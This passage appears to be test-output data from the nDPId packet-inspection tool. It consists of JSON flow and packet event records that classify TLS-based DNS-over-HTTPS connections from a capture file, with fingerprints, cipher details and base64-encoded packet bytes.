h4ZNVa+hT2Dwwrpwf9EMB3SMWmSnSLNfZ1YP9lq\/H3H\/YzkchSbogwVw+NXvSKa3Q5dILWczbhkBruescLznbqY0DC+TTlEnvK+mjob5wwR3lQsp8odDMfmh22P3SAFc1ZvCoRb2GkaVN69lxvgMa3mO7aDcfiHSTbC8C9cXAwMARePoOyVbKZG3xXgBtpg5jANBShpYQchD5Po7jBmjBEffrOCijDBbST3aotIn5HBfw8iB7gJCrbmWU17Z2peLW9KOid+9"} -00956{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400294,"flow_last_seen":946739400340,"flow_idle_time":7440000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3196,"flow_avg_l4_payload_len":1598,"midstream":1,"thread_ts_msec":946739400340,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":441,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":946739400340,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAApAAJAADgGtq+S\/zhiCgAAAQG7qsavYnvOXaanwFAYBBNMgAAA9gAAAAAA"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":946739400581,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":341,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":341,"pkt_l4_len":307,"thread_ts_msec":946739400581,"pkt":"REREREREZmZmZmZmCABFAAFHpuhAAH4GfboKAAABwUZVC9OUAbunNzlTos+VOVAYAfbYRwAAFgMBARoBAAEWAwO9Yq6mzn6Kf+YkY+w4Q\/vo+7yhlWhjohroCY4Mal823CCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XwAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACnAAAAFgAUAAARZG9oLmJvcnR6bWV5ZXIuZnIABQAFAQAAAAAACgAKAAgAHQAXABgAGQALAAIBAAANABoAGAgEBAMIBwgFCAYEAQUBBgEFAwYDAgECA\/8BAAEAABAADgAMAmgyCGh0dHAvMS4xABIAAAArAAkIAwQDAwMCAwEAMwAmACQAHQAg6wutcF723xZ1OaF0ooDfgy7xahyBeOD2x7PNk\/t6gG4="} -00908{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400581,"flow_last_seen":946739400581,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":287,"flow_tot_l4_payload_len":287,"flow_avg_l4_payload_len":287,"midstream":1,"thread_ts_msec":946739400581,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -04382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":946739400612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAuA435AADQGgOvBRlULCgAAAQG705Siz5U5pzc6clAYAfXigAAAFgMDAHoCAAB2AwPum08l8a\/xsIE7sf4ouj1cFjIcJvTzL6IcltC8x2MVWyCy3rkp5WTaWd5nTdItXIFahRCh9ETfjIRyGCS4r9a3XxMCAAAuACsAAgMEADMAJAAdACDFCe5GcFoAINJ8W\/U00yxwlYg7Wtx0yaBhsZxlJVHAahQDAwABARcDAwAgjb6\/bt9RU3n7f\/XK70kHoogWe0pWzujxYyDQFCzDS9sXAwMKFyLHVFWncnvuWpj00oLMIDtr5tAZiqfcqzwOOMNYqfKKQHH219coqZSx1dHk2hi5d1LB3GytI8vYkc59i5RQQDbXAHUuezlbBvO8F+B3yrBrypISyNX1A4sx1E9x9g092nWO74tZVT++3VZ86RoDvvF0ZUqxTSHr+1nR9kKZh0N5lUkvTu0aK5ORhVWNfmq0hwnrW5s27rBfHFIN8y0h27yxFq4SIl7wwuk6Mq7vkrvqIsM5xqyCc\/9Xu0OqSF3zUNnkItIrGQeIJp3LGwwIhQxxQAsnuWmwcXNFRqEzMD5jbEtpKYkHahCBuU\/B3PKrCTX8+YsVVjGS5Qrjne3Kr5FWp6nlPfIH59LkIEasv75h75FcjD+7wr54z1JIPpP7ZrLR5PywuD6f88xvloKZN+WwiXGAie649c7JKsyGwCn507cb9CeSrJLhgRoQlUSUEBlnxiSHhJ2mw9owqvmzHqRqTxGrXh9qTPYDQpk5QRLmSGX3D7g6VS6CrNB+GfCK6SPMgzdR+k8lAJJdHOY0ZZdv+Ya6nA3r8RDkXrspyuJsV4QMPLAoNzQvGen9CeK5JxcSLtBMp5q0B1DBO5EIcsoLQQ6lCwlPm8U6NZmJK6eA9zbgzP80r8LRBBpZx1beD6mw3j+TpFAy+igQ8+ETtD4YPbZPWCgC6xVG0u33AvPq8sRsHwGqnzJp1MW\/CDUHInzc9xT9j80aqrzF0XcmMIsrs4KNMQ8QDQCsJmct9U0iMbkLXGLFA32BoRsU95KY+6gDs57twsE3JaqfYSuTq\/Dlicgoiy07U8DZsIf1tKivKbhBZS1qr1PaAU2W3RuJy+8koP4fg1irOvcozqBrDOixlNBNoG8ob7RGwcT3Z0ArR3tWTeHxhQydU29KSYU8HwZniOUgn1K8cz071\/P8S72m5u89j2RZsoG54t+A\/1vLyZMsjOXjwepn9YLOohxBXEIx84KuxUh3bAga+k\/yE8GW5vng0KtP1aBiU4Tc6A+REN2DA3ij6lHoD2sFhJA2fLcssM6OpAK\/moM166igfSm3LqGC4gK+TDj4gtClJchy8bvN8tctQ8iFjFj\/6qv7lxplsZ49PvHPbnKju\/tev2fd5dDj7QcMjqNvhblPBUZ32SOOjxBH3RE7aBpBLMz7W1\/NpSWcgM15pyZsPx8isO02KbyH6gAHIs+ZEGj61i6mnrDsMNesZUMUM55VeDXhdpD8kmxGJpLZ3bsJ69dZmjx3Rf6Zgw2KbXhlm6KMoEBrRSd15+xgTimUz9H5N6PvNLfaRiGX8r4RI6AIPrxRNjrz1JtdmeN1NzdaLUaHCvnql7jjxoX9Sn8xtUQxnkcUzYoweeIrvi9ulLP7ucnd54pGXhyPpURQBCM2nU9nbu+b6Pbj4vx7uFCRh\/lkqhRWVdTtE5uZmH8x4uxAXTdo\/R5oSgAkEsgUzYbuz4+G0Ch0T6jruu4T9ekEthrBCQJjN3fHGBcpM7AMfx+FKZas1DTjRC6L41JS2ixQWYjQbws0Hx+sBQGG6PAX0ilnkOFTCqdi4OZ+YhHBZ3aa4TDran\/FLmLs4pdGLb\/oqLyzwsvNQ7jdGUh2A89lsoDzqOObMQCUrWrG7EbmBEy\/sbHnGgiIy31PynXQexT3lSGWXsVy54UK1SdBZ18JpRAq1XaEcJZV9BqOYiMFEVnHR9zwIUFWwIjG0UpAOSNn7blveeCwW\/YovVsVKboGuW3yyReDZYyNgSvRfgvPpiG+pklW5Ihw+wYJ1sPXS0I2yAnATL00hg3Bnv3J6\/Z\/+4vJOHMRe5zCkPZYK8w\/AOnTp5VZVUALMm2aJruUFq4CXZyWMk1kbL3XBzpFB\/roJe8IiU+Kt9kQ449THNAxRUoavQeSeXnuQSkwDYmI0buLWeiaEzMUY5OavuLtDgD4c+avQlGrce7Ozez1RlLgPgV+i3DcrjoWos6tTeu8g4pr3NuCp14nKYaub7Vt2s0JPBPZqY\/MuyLA\/e3Fr\/OMlh\/EauRFDsRaqiHBJ2mP3NA8\/ZyaQQcWAIVjHSjsVGu2nQBYWjKsZ8mKcS9VpMr9ndCkWOs5Sz5zWAutH8paKKKAqBcvloCRHOWIfcJ9h9uc3Lq9DYb+le+8B4yxwh7qQJOXNZwdUQbb19fMRPNRiaEzON5GpXpNywN75iIVBnfCJp5hZfV7tIfK22ta\/Z6stqDCIyk+p27DCeEPYmTJDSSHKNbedRdn0\/iB9LUsBrCmi7IRRBlE2Tr8s2JDIPOoL9S4j6C6g1r3fpCuw4mXBrcGCfNjDw6rPYEplJqhIiTO+juQuxn5Prjqj21RvbfTbyzJIvTV7a0Zy5SJ1YWQ9z3NLs75HRnYaEIc3G103AKPkytzCjXINk0eKUkCZXrW9QupQw5YZCi9c+zr9e6Nsrg4KBkr13ePLbPEqhzK0TgphOe\/BgDw39ES3e0uIMvXuKrcPIZlkW8iZdSPWqT0Pls1rgFcXIxjJuZzAKdz9RIDjZGrpzpHXAzwarf0m0i2Gtw3bYKFHdkTT5n1uaYQthMuQHJHi+p8XDFtekQax3jKJD3CiZg+YeLzJ5Uo0iEidZKe5rH7ZzgkT8O0rVZwq5niGJgbiV3EUpPldHNKypyvkj3ycT9kY2IJU7ZpXJRnpDRxjhVDO4G\/kK6jqgKdwB9YrN8ddL2ErNeFlxtrqM8tHt2ZYdSMZYCnp2omvPy97RCe3Cp\/HGnLxpRs+DW569z8h8BSfI\/zMEZeQ4RsdRgF8hz+rQ8SRDGvtaqUblOPSNlurg9vSpcyYw7DcuCxkCASBOvLXbWh8As7fT8An8+JscVf\/lq\/mGQvDlSuFNj+tDMXoI0ZKapFzG\/KPdLhwKgFCipECC9Er6NeMVnAw07Z3oto50ydjbh57kzukh0zqDBLZjEhtFpoAiVBqZg7B50ytdFgK+6hZgsHjVoNuFRf32MJngr13fBBtHKo\/VHaVg4drs9W9DfAL1w5rtOMVsX6aUt1YAeiwdGBNEPyNmvNCcEQOj+xzMfVoOLm7SUXFyIm1n+reDHyXo8yNG7LkDYjmq\/JLkrpjl4bFeLBsdG760CBaEUCZJd3nvhfPPBsfCBF5PswuYpAEifKeZ17NlOaSrxj79WssKYt4uUKm2gm9JHcvNneM5n7DQEooPTVEVYNOgvXrRVlbfz+Cy2kBP2gCp+jUrcKx4YKGEhDuMaL8PfHGRT2vA7nqzUU9C3cJ3emOjaD7KMjipJvPBaA7U+L8ujhu2gJWLx4yY7mn3RV6K2HsrFjTJduvDGB+DqQg96t2CJjvMbpqIitN9hBxZbznMh3XU1HogwVfIbOe8Ug8cikY7ag9rW6E1CfeBwa9CM8u9CTXlTgumW220WzI\/+S8CMvOup0C9PugMt2Jc4cXDvNs+dyRWH3X7QIImonFrQ6RaFIHlbDa5gqN+0VC87hnjQE8OUpxOAg1ReSXhcDAwEZLWp\/o3fXWPvp18ZXCuvlFC4i5H\/0jL\/Tq956IZziJu\/XhSjlSr056BPu7zKCegDZWzYsK6oLPWAfcvtcSfAPACHpLE+JYCNMevr7LjdkYBxYeJsjktZDgoEi7lSxc1XaPOcOHuKcNBIZPhHzY\/jpu14RecKRjxP8M4PlZTTXUvzf286xa1A7FPGcV7e6"} -00950{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":455,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400581,"flow_last_seen":946739400612,"flow_idle_time":7440000,"flow_min_l4_payload_len":287,"flow_max_l4_payload_len":2904,"flow_tot_l4_payload_len":3191,"flow_avg_l4_payload_len":1595,"midstream":1,"thread_ts_msec":946739400612,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"193.70.85.11","src_port":54164,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.bortzmeyer.fr","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00753{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":946739400612,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":268,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":268,"pkt_l4_len":234,"thread_ts_msec":946739400612,"pkt":"ZmZmZmZmRERERERECABFAAD+44BAADQGi2vBRlULCgAAAQG705Siz6CRpzc6clAYAfVAMQAA7MoGonW0Fj4lHArVaOCgJtbHn9aRY0n9LKnu3cTyqbChLhfccHsdC81z2fZ+Ukv\/nAuBoKACJX8Pwem5JBIGeQ+hR9gvbJqO0dljTEjfnQJGlcWyJk4FqoFjayNoVLdbRg\/yWeK8VeLtflQjLxqwMpDM\/QbduG5HAuBrFrE4C7dTGq1PezTGhU9pqGsXAwMARb1ScBcpf\/m81VPRA3LW\/2mv0IZmicbA7T0x5byJ5bKDeMQneniKc1y1kH9Jz7ueZz9IjjqOqk3CW8r0ZREMc3BCfYPYBQ=="} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00848{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":946739400702,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":342,"pkt_l4_len":308,"thread_ts_msec":946739400702,"pkt":"REREREREZmZmZmZmCABFAAFILINAAH4GS1wKAAAB0frxGYuCAbtSRrNTwAekRVAYAfaFCwAAFgMBARsBAAEXAwMzpeRPPpmPOBWwlYuEr5uNgoasUYbxY5rOmYFKCjGtJyAIAEydch7b9cupGuDzo92xh9NLKrnQMxUlfE7nWZM5\/gAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACoAAAAFwAVAAASamFyamFyLm1lZ2FuZXJkLm5sAAUABQEAAAAAAAoACgAIAB0AFwAYABkACwACAQAADQAaABgIBAQDCAcIBQgGBAEFAQYBBQMGAwIBAgP\/AQABAAAQAA4ADAJoMghodHRwLzEuMQASAAAAKwAJCAMEAwMDAgMBADMAJgAkAB0AIJeuQLdGEJN7n7Os\/LoZLYTlp1p11dddxIYAQZdOassB"} -00911{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":469,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400702,"flow_last_seen":946739400702,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":288,"flow_tot_l4_payload_len":288,"flow_avg_l4_payload_len":288,"midstream":1,"thread_ts_msec":946739400702,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -03224{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":946739400727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":2102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2102,"pkt_l4_len":2068,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAgouN1AADcG\/yHR+vEZCgAAAQG7i4LAB6RFUka0c1AYAfWL6wAAFgMDAGYCAABiAwNagb8+u4y1yd1xwzS1nH\/nTUIdC4eY2A55MtUayrM8fyDO5yrWZS4Aa1iS7gSLPLT\/C8LAuC029TJv1sr4CTESSMAwAAAa\/wEAAQAACwAEAwABAgAFAAAAEAAFAAMCaDIWAwMKAwsACf8ACfwABWAwggVcMIIERKADAgECAhIDDKJHTnwjwsnrm2DLrI1zNLUwDQYJKoZIhvcNAQELBQAwSjELMAkGA1UEBhMCVVMxFjAUBgNVBAoTDUxldCdzIEVuY3J5cHQxIzAhBgNVBAMTGkxldCdzIEVuY3J5cHQgQXV0aG9yaXR5IFgzMB4XDTIwMDcxNDIzNDcyMVoXDTIwMTAxMjIzNDcyMVowHTEbMBkGA1UEAxMSamFyamFyLm1lZ2FuZXJkLm5sMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAv9OPyuZ6JwIE6bPDfiRhbYPMkVlSRq93tijiXoOFC9OQc4eXtoMomU6kKPy5Z0NTzEB3WAHxrA4SRx6q3\/yefPeWA8HsMuYfQZpftg95obbyxbYYejVTJGcDt7bBAbyfyHwpa9VQXCZ1NM6170XCwqiTXQ5pCT67h001VbP663EnKohkf0MUwppbn6Q5xEFc+o+3D6IU\/rxkzW1SQTh0phbzb1Op8DfM63A\/ZtxaA5UoEOBp23CMkB\/vP5ul2uJharTqU\/BfvvV3HB\/zu9o43hkbooUEyMuBJn0+O6orVhwG1QVKM6xj5TM6ZcijU2+3rS+x7vNJUt\/bTHh7sHDviQIDAQABo4ICZzCCAmMwDgYDVR0PAQH\/BAQDAgWgMB0GA1UdJQQWMBQGCCsGAQUFBwMBBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAAMB0GA1UdDgQWBBRLbCV+QerkMWgquQ7dzQvZqcefiTAfBgNVHSMEGDAWgBSoSmpjBH3duubRObemRWXv86jsoTBvBggrBgEFBQcBAQRjMGEwLgYIKwYBBQUHMAGGImh0dHA6Ly9vY3NwLmludC14My5sZXRzZW5jcnlwdC5vcmcwLwYIKwYBBQUHMAKGI2h0dHA6Ly9jZXJ0LmludC14My5sZXRzZW5jcnlwdC5vcmcvMB0GA1UdEQQWMBSCEmphcmphci5tZWdhbmVyZC5ubDBMBgNVHSAERTBDMAgGBmeBDAECATA3BgsrBgEEAYLfEwEBATAoMCYGCCsGAQUFBwIBFhpodHRwOi8vY3BzLmxldHNlbmNyeXB0Lm9yZzCCAQQGCisGAQQB1nkCBAIEgfUEgfIA8AB3AF6nc\/nfVsDntTZIfdBJ4DJ6kZoMhKESEoQYdZaBcUVYAAABc0\/ws2wAAAQDAEgwRgIhAMWgM8fCSKocSMS6vNmRTIKDzMWXKgtHRh\/4TftRR0QHAiEA3JSerrntM9u7waurWrvwybuL6dB9RsJnzjR8MMY9tuIAdQAHt1wb5X1o\/\/Gwxh0jFce65ld8V5S3au68YToaadOiHAAAAXNP8LOOAAAEAwBGMEQCIG6J2T+qpPVVFxjS27cFglwKmn3u\/zi2QCL4kFgVvwefAiAZm3eKKyeMogTwUuYzbx+RsfIEqA9nNOdkRRv\/z1FxuzANBgkqhkiG9w0BAQsFAAOCAQEAcAija84yR1ADOoiyrdQFCgxJZB2BUUNBtRgi8ZPFZIdUaVPomyGL3oK59c6IO+gMw6xbSeGsLaVjettLRMJ2uMl6JZkgjV1Bhp3NdPQKieFpoaEiEBUAwqL8TSBKdJ\/mAMQLAKadqZ1hZKcVTPtXVdd5Q28iLasE\/NjtopLZOa1XOJt0sUbRAHa2FOZzb42ureqnIdzzYgm+hY18KJUkfrSxCg2dd4MTgQuYu+ZhUpaMB2rAm94XcTgVTGO5ADi5NM0oEFFNdNKrAyCom1jWC2m8LyYfCzUJEAYCAUd1WL438vW1Z0FQZK5dAca9qTf6FxrRdYRYrY7oGND3IwvyWwAEljCCBJIwggN6oAMCAQICEAoBQUIAAAFThXNqC4XspwgwDQYJKoZIhvcNAQELBQAwPzEkMCIGA1UEChMbRGlnaXRhbCBTaWduYXR1cmUgVHJ1c3QgQ28uMRcwFQYDVQQDEw5EU1QgUm9vdCBDQSBYMzAeFw0xNjAzMTcxNjQwNDZaFw0yMTAzMTcxNjQwNDZaMEoxCzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MSMwIQYDVQQDExpMZXQncyBFbmNyeXB0IEF1dGhvcml0eSBYMzCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAJzTDPBa5S5Ht3JdN4OzaGMw6tc1Jhkl4b2+NfFwki+3uEtBBaupnjUIWOyxKsRohwuj43Xk5vOnYnG6eYFgH9eRmp\/z0HhncchpDpWRz\/7mmelgPEjMfspNdxIknUcbWuu57B43ABycrHunBerOSuu9QeU2mLnL\/W08lmjfIypCkAyGdGfIf6WauFJhFBM\/ZemCh8vb+g5W9oaJ84U\/l4avsNwa72sNlRZ9xCugZbKZBDZ1gGusSvMbkEl4L6KWTyogJSkExnTA0DHNjzE4lRa6qDO4Q\/GxH8Mwf6J5MRM9LTb44\/zyM2q5OTHFr8SNDR1kFjOq+oQpttQLwNh9w5MCAwEAAaOCAX0wggF5MBIGA1UdEwEB\/wQIMAYBAf8CAQAwDgYDVR0="} -00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":470,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739400702,"flow_last_seen":946739400727,"flow_idle_time":7440000,"flow_min_l4_payload_len":288,"flow_max_l4_payload_len":2048,"flow_tot_l4_payload_len":2336,"flow_avg_l4_payload_len":1168,"midstream":1,"thread_ts_msec":946739400727,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":35714,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"jarjar.meganerd.nl","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"2464432ec440b95b36263230c3148d11","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":471,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":946739400727,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1535,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1535,"pkt_l4_len":1501,"thread_ts_msec":946739400727,"pkt":"ZmZmZmZmRERERERECABFAAXxuN9AADcGAVfR+vEZCgAAAQG7i4LAB6xFUka0c1AYAfWJtAAADwEB\/wQEAwIBhjB\/BggrBgEFBQcBAQRzMHEwMgYIKwYBBQUHMAGGJmh0dHA6Ly9pc3JnLnRydXN0aWQub2NzcC5pZGVudHJ1c3QuY29tMDsGCCsGAQUFBzAChi9odHRwOi8vYXBwcy5pZGVudHJ1c3QuY29tL3Jvb3RzL2RzdHJvb3RjYXgzLnA3YzAfBgNVHSMEGDAWgBTEp7Gkeyxx+tvhS5B1\/8QVYIWJEDBUBgNVHSAETTBLMAgGBmeBDAECATA\/BgsrBgEEAYLfEwEBATAwMC4GCCsGAQUFBwIBFiJodHRwOi8vY3BzLnJvb3QteDEubGV0c2VuY3J5cHQub3JnMDwGA1UdHwQ1MDMwMaAvoC2GK2h0dHA6Ly9jcmwuaWRlbnRydXN0LmNvbS9EU1RST09UQ0FYM0NSTC5jcmwwHQYDVR0OBBYEFKhKamMEfd265tE5t6ZFZe\/zqOyhMA0GCSqGSIb3DQEBCwUAA4IBAQDdM9cR82NYON0YFfsJVb52VrlwSKVpRyd7wiQIkvFaH0oSKTckdFEcYmi4zZVwZ+X3pLxOKFHNm+iuh53q2LpaoQGa3PDdah1q2D5XI56mHgRimv\/XBcq3Hz\/ACki8lLC2ZWLgwVTloyqtIMTp5rvcyPa1wzKjmMx3qOZ5ZQcryyj+OhZSgc5SDC5fg+jVBjP7d2zOQOoynh+SXEHBdGxbXQpfM8xNn6w48C97LGKd2aORbyUbL5CxGUY99n4bpnqHuaN6bRj6JaWRhxXg8hYvWLAGLyxoJsZLmM3anwz5f5DtQ0oSRE5vc3oo6qSqbntMfYfd4MkCRKeHr8M0W7RCFgMDAhcWAAITAQACDzCCAgsKAQCgggIEMIICAAYJKwYBBQUHMAEBBIIB8TCCAe0wgdahTDBKMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5jcnlwdDEjMCEGA1UEAxMaTGV0J3MgRW5jcnlwdCBBdXRob3JpdHkgWDMYDzIwMjAwOTA0MDA0OTAwWjB1MHMwSzAJBgUrDgMCGgUABBR+5mrncpqz\/PiiIGRsFqEtYHEIXQQUqEpqYwR93brm0Tm3pkVl7\/Oo7KECEgMMokdOfCPCyeubYMusjXM0tYAAGA8yMDIwMDkwNDAwMDAwMFqgERgPMjAyMDA5MTEwMDAwMDBaMA0GCSqGSIb3DQEBCwUAA4IBAQAoMB1ePZKC8NpTy2434kCI6h8NAXGSDejnRZYFr2QSx+TpoZipUWbMWCq8UzrMIxKC8UJACJQc6RIM+Xgz0ZRbGx25OD3V4vLxsczn\/nEIsXCHGvGoEBJqPqesQfpmU9r+oB2CbUgxGaJxDFqnidG6tH5KNxFVbrX2lPzXeDzKwLN1eUiZU\/lMuAOJwkK8zmwVXP5H7g6aco+MiZp06K8b\/Da3w0YGUY9fjEablMtV5ViuxARhZw1pWYWZo\/jGfvICDNvPKmx8V1X1Z4R8rNjm8UiPRR8P0NarasVvNtWs+6fXGpl\/hFMZzj6z4oAVh0vYNXKYxmaDs8l6pH8OOZ\/cFgMDASwMAAEoAwAdIBuLZjnTB3Kjce7+mNxfaBiRgPo4iNkyTjzm6+fh98MBCAQBAAD35z4OurpaleuYyQXrRwgunZx5itw99f\/qns7fqVRPpCakkPBqYtIkrAQds7t3x9gcyB3pN\/ek7QU4lXsRRnsrWpFsVpkkgouj8noQcYPmvp55cuzOEjLxYK5KOB1bU10ZmdANW3hMqgjTathZk6jfjNOD8MgF15uckgPUXOITOpG7UYd\/YtxRx7xgMGY0jlH\/+xeUF+NSAiy6s9oSi0oU\/QlatPOidPhVmRC84vWQNkgJhZubcKWseKLjiRRL9zUmMJ2fjig0R0EKUVh0pAUSNWsA0m3x1YIPV6kX\/fzGNkCBx4kijVkxENgEgAD9si+WguAjMtSH5qQYN0CMxwsWAwMABA4AAAA="} 